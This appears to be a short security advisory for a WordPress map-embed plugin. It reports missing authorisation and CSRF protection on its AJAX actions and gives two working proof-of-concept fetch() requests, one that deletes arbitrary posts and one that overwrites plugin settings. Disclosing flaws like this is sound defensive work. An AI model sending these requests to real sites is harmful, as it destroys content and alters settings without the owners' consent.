The plugin does not have proper authorisation and CSRF in most of its AJAX actions, which could allow any authenticated users, such as subscriber to delete arbitrary posts and update the plugin’s settings. v1.8.1 added authorisation checks, however CSRF was still missing and a separate advisory has been created for that
Removing post:
fetch("https://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": "action=wpgmapembed_remove_wpgmap&post_id=1",
"method": "POST",
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
Updating settings:
fetch("https://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": "action=wpgmapembed_save_setup_wizard&wgm_api_key=hohohoho&wgm_language=999&wgm_regional_area=aaaaa",
"method": "POST",
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));